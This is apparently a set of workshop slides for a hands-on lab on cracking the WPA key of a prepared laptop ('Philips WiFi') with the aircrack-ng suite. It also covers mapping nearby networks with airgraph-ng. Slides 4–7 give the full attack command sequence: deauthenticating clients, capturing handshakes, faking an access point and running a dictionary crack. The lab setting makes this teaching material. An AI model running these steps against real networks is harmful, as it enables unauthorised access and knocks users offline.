1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).

2 Practical stuff - Tips Make sure to disable all network managers and other programs using wireless interfaces: –airmon-ng check kill Madwifi-ng –airmon-ng stop ath0 –airmon-ng start wifi0 If you don’t see the handshake with aircrack-ng (or any other tool), open your capture file with wireshark and filter it with « eapol ».

3 Steps 1.Get the handshake With the AP Without the AP 2.Create airolib-ng database 3.Crack the handshake

4 Get the handshake – With AP Start airodump-ng to find the channel of the AP: airodump-ng INTERFACE Make sure a client is connected. If there are none, you won’t be able to get the handshake When you have the channel, stop the previous instance (Ctrl-C) and start it again on the channel of the AP (and save packets): airodump-ng –c AP_CHANNEL –w philips-capture INTERFACE Open a new terminal and deauthenticate the client: aireplay-ng –deauth 1 –a BSSID –c CLIENT_MAC INTERFACE If you didn’t get it, try again without specifying the client MAC (some drivers prefer broadcast deauth): aireplay-ng –deauth 1 –a BSSID INTERFACE

5 Get the handshake – Without AP Start airbase-ng –WPA-PSK (TKIP) –SSID: Philips WiFi –Do not answer to any other probe request –Channel 6 –Save packets into philips-capture airbase-ng -z 2 -W 1 -e “Philips WiFi” –y -c 6 –F philips-capture rausb0 Notes: I’ll do this; Everybody doing it at once may not give the expected result :) However, you can start airodump-ng on channel 6: airodump-ng –c 6 –w philips-capture INTERFACE A bug in madwifi-ng prevent it from working correctly with airbase-ng

6 Creating airolib-ng database Since a cowpatty table already exist, we’ll use it with airolib-ng: –Output database: philips_airolib –Import cowpatty file "Philips WiFi" airolib-ng philips_airolib --import cowpatty "Philips WiFi"

7 Crack the handshake Use aircrack-ng to crack the key: –Capture file: philips-capture-01.cap Using airolib-ng database: aircrack-ng –r philips_airolib philips-capture-01.cap Using a wordlist: aircrack-ng –w passphrases.txt philips-capture-01.cap

8 Practical stuff - Airgraph-ng Creates a picture of the wireless networks Wardriver or just want to monitor your network, this is for you.

9 Practical stuff - Airgraph-ng (2)

10 Practical Stuff – Aigraph-ng (3) Run airodump-ng with the parameters you want (however -w is mandatory to make it work). Airodump-ng writes the CSV file every 5 seconds. Whenever you want, start airgraph-ng on the CSV file.

11 Practical stuff - Airgraph-ng (4) Parameters: –Input file: Airodump-ng CSV file (.txt) –Graph type: CAPR (Client – AP Relationship): Connected clients CPG (Common Probe Graph): Probed SSID –Output file: Picture file name Examples: –CAPR: airgraph-ng.py -i../airgraph-01.txt -t CAPR -o../airgraph-capr.png –CPG: airgraph-ng.py -i../airgraph-01.txt -t CPG -o../airgraph-cpg.png